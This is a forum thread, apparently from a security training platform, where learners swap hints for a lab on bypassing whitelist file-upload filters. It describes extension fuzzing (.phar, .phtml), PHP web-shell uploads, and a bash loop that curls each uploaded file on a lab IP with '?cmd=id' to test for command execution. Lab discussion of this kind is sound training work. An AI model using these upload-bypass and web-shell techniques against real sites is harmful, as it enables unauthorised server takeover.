File Upload Attacks - Whitelist Filters

h311fish · December 29, 2022, 2:20pm

hey,

thx a lot. with your help i solve this…:)…

magic · December 30, 2022, 1:37am

For those who are still struggling - EZi0’s comment will get you what you need.

Some steps to help you:

Modify the script that HTB academy provides to generate your wordlist.txt file with a few extra extensions (ex. .phar and .phtml)
In burp intruder, send each post request with a PHP payload and the filenames those created by the script.
Curl each endpoint and supply ‘?cmd=id’ to check for successful 200’s

This is the script I like to use to automate commands feeding in a wordlist as a variable. ex. ./repeat.sh wordlist.txt

#!/bin/bash
#usage: supply your filename wordlist with the execution of this script. It replaces each line with $line 
#./repeat.sh wordlist.txt

input=$1
while IFS= read -r line
do
        echo 'doing' $line':'
        curl -I http://139.59.171.86:32638/profile_images/$line?cmd=id
done < "$input"

Hope that helps

Gattsu · January 13, 2023, 10:41pm

If you haven’t solved it from what I can remember you are super close, try more combinations of characters. The file will be uploaded with the extension you try and will be reachable, you just need to find the right one.

dougthonus · February 26, 2023, 3:01pm

Was stuck here for a long time trying to get character injection techniques to work and was not successful. I was able to upload files successfully with character injection but attempts to reference them always came back as 404. I thought this was working because phps was giving me no permissions, but I found anything.phps gave the same error so that message wasn’t indicative of anything.

The advice in this thread around expanding the extensions beyond what you use in the scirpt is helpful and then what I noticed is that phar and phtml had a lot more “successes” than php with character injection, even though I didn’t use character injection this sparked the realization that they were treated differently and a more simple approach with those might work.

Wish I had been able to get character injection going, I tried doing teh curl script after the upload script but just got not found on every file link. Also tried just removing the characters since I would think the goal is that these injections save your file as shell.php but that didn’t work either. In the end, still got there though.

pavka · March 20, 2023, 1:48pm

Qick tipp: the example from " Reverse Double Extension" works fine for this task (but not with .php, try different one)

DGM · April 25, 2023, 8:58pm

Also can try this tool: GitHub - almandin/fuxploider: File upload vulnerability scanner and exploitation tool.